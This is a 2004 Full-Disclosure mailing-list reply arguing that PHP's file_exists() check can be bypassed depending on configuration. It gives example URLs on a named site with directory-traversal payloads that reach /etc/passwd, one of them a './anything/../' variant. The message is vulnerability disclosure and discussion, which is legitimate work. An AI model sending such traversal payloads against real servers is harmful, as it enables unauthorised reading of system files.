[Full-Disclosure] RE: file_exists() bypassing , critical problem ?
Nourredine Himeur
lostnoobs at security-challenge.com
Mon Feb 2 14:12:25 GMT 2004
Hi,
It depends of your php configuration... (but it's not a vulnerability so
..... i can say you what's the configuration is good ,because firstly nobody
listen me and secondly php-group are blind and deaf)
look this :
http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html
http://www.opensavoir.com/test.txt
http://www.opensavoir.com/test.php
http://www.opensavoir.com/test.php?page=../../../../../../../../../../etc/pa
sswd
but it's not a vulnerability HA ! HA ! HA ! show this :
http://www.opensavoir.com/test.php?page=./anything/../../../../../../../../.
./../etc/passwd
:)
Nourredine Himeur
www.security-challenge.com
Full-Disclosure is hosted and sponsored by Secunia.